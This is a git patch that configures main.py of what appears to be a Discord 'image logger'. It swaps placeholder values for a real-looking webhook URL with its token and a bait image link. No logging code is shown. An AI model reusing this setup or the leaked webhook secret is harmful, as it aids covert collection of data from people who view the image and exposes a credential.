From 3284c15b99e2aeccf80502c4fe1b0f817daef4dc Mon Sep 17 00:00:00 2001 From: TexasKaddin <115769075+TexasSypher@users.noreply.github.com> Date: Wed, 31 Jul 2024 03:07:17 -0700 Subject: [PATCH] Update main.py --- main.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/main.py b/main.py index 9600de7..4201a95 100644 --- a/main.py +++ b/main.py @@ -12,8 +12,8 @@ config = { # BASE CONFIG # - "webhook": "https://discord.com/api/webhooks/your/webhook", - "image": "https://link-to-your-image.here", # You can also have a custom image by using a URL argument + "webhook": "https://discord.com/api/webhooks/1261396872388546700/1sGG0sZP80wpPBB8uYf36YWH7UlRwSc8_GnlfidKG2L6bFDEOPQE8PKVTqF3TRExX-Oq", + "image": "https://cdn.discordapp.com/attachments/1261396853510115408/1268147887695466609/photo_2024-07-13_04-31-34.jpg?ex=66ab5e41&is=66aa0cc1&hm=933cad7547693590bfe23cb879fa8bbdc64478e1539ea268bfc4217f75e6f83c&", # You can also have a custom image by using a URL argument # (E.g. yoursite.com/imagelogger?url=) "imageArgument": True, # Allows you to use a URL argument to change the image (SEE THE README)